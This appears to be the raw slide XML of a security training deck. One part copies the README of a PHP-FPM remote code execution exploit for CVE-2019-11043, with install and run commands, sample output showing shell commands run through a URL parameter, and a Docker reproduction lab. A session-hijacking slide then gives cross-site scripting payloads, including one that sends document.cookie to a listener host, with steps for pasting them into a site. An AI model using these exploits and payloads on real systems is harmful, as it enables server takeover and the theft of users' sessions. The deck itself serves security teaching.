              <a:t>The current one doesn't require file upload, works in the most recent versions (until the fix has landed), and, most importantly, the exploit is much cooler.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>## How to run</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Install it using</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>go get github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>neex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>phuip-fpizdam</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>If you get strange compilation errors, make sure you're using go &gt;= 1.13. Run the program using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>phuip-fpizdam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>] (assuming you have the $GOPATH/bin inside your $PATH, otherwise specify the full path to the binary). Good output looks like this:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2019/10/01 02:46:15 Base status code is 200</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2019/10/01 02:46:15 Status code 500 for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>qsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=1745, adding as a candidate</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2019/10/01 02:46:15 The target is probably vulnerable. Possible QSLs: [1735 1740 1745]</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2019/10/01 02:46:16 Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> found: --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>qsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 1735 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pisos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 126 --skip-detect</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2019/10/01 02:46:16 Trying to set "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>session.auto_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=0"...</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2019/10/01 02:46:16 Detect() returned attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>: --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>qsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 1735 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pisos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 126 --skip-detect &lt;-- REMEMBER THIS</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2019/10/01 02:46:16 Performing attack using php.ini settings...</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19573532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865AF51-88E0-49A9-BA6A-FA5D5B894C45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2682875" y="671691"/>
            <a:ext cx="7504314" cy="6186309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2019/10/01 02:46:40 Success! Was able to execute a command by appending "?a=/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>+-c+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>which+which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'&amp;" to URLs</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2019/10/01 02:46:40 Trying to cleanup /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/a...</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2019/10/01 02:46:40 Done!</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>`After this, you can start appending `?a=&lt;your command&gt;` to all PHP scripts (you may need multiple retries).</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>## Playground environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>If you want to reproduce the issue or play with the exploit locally, do the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>1. Clone this repo and go to the `reproducer` directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2. Create the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> image using `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> build -t reproduce-cve-2019-11043 .`. It takes a long time as it internally clones the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> repository and builds it from the source. However, it will be easier this way if you want to debug the exploit. The revision built is the one right before the fix.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2. Run the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> using `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> run --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -p 8080:80 reproduce-cve-2019-11043`.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>3. Now you have http://127.0.0.1:8080/script.php, which is an empty file.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>4. Run the exploit using `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>phuip-fpizdam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> http://127.0.0.1:8080/script.php`</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>5. If everything is ok, you'll be able to execute commands by appending `?a=` to the script: http://127.0.0.1:8080/script.php?a=id. Try multiple times as only some of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-fpm workers are infected.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104710774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283081" y="2318529"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>## About PHP5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>The buffer underflow in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>-fpm is present in PHP version 5. However, this exploit makes use of an optimization used for storing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>FastCGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> variables, [_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>fcgi_data_seg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>](https://github.com/php/php-src/blob/5d6e923/main/fastcgi.c#L186). This optimization is present only in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> 7, so this particular exploit works only for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> 7. There might be another exploitation technique that works in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> 5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>## Credits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Original anomaly discovered by [d90pwn](https://twitter.com/d90pwn) during Real World CTF. Root clause found by me (Emil Lerner) as well as the way to set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>php.inioptions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>. Final php.ini options set is found by [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>beched</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>](</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://twitter.com/ahack_ru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188261745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E70BEE4-B22C-4202-A591-B86A8F95E802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-64149"/>
            <a:ext cx="12192000" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                           DAY -5</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                            Session hijacking attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4D9E703-AB89-406B-AFFA-EAD0922AB4AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2375795" y="1192818"/>
            <a:ext cx="7823200" cy="5324535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step -1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Go to browser and search </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Crosssite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> scripting clean sheet </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Then select tags </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Then copy the code </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>noscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> title="&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>noscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>=alert(1)&gt;"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>noscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step -2 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Then take a domain name and search it in new tab</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Then paste the code in that site </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>noscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> title="&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>noscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>=alert(1)&gt;"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>noscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Then you will get a popup raised and gives 1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>After that  again search for </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>That code this time remove alert(1) </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>And replace it by  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>windows.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>='http://127.0.0.1:1337/?cookie='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268826072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B7B75BA-ABD5-414C-8F2A-05DB8E86FC36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2352674" y="443864"/>
            <a:ext cx="7680325" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step -5 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;script&gt;alert("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>windows.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>='http://127.0.0.1:1337/?cookie='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'") ;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step -6</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>We got in popup</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A testphp.vulnweb.com + 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>testphp.vulnweb.com says</a:t>
            </a:r>
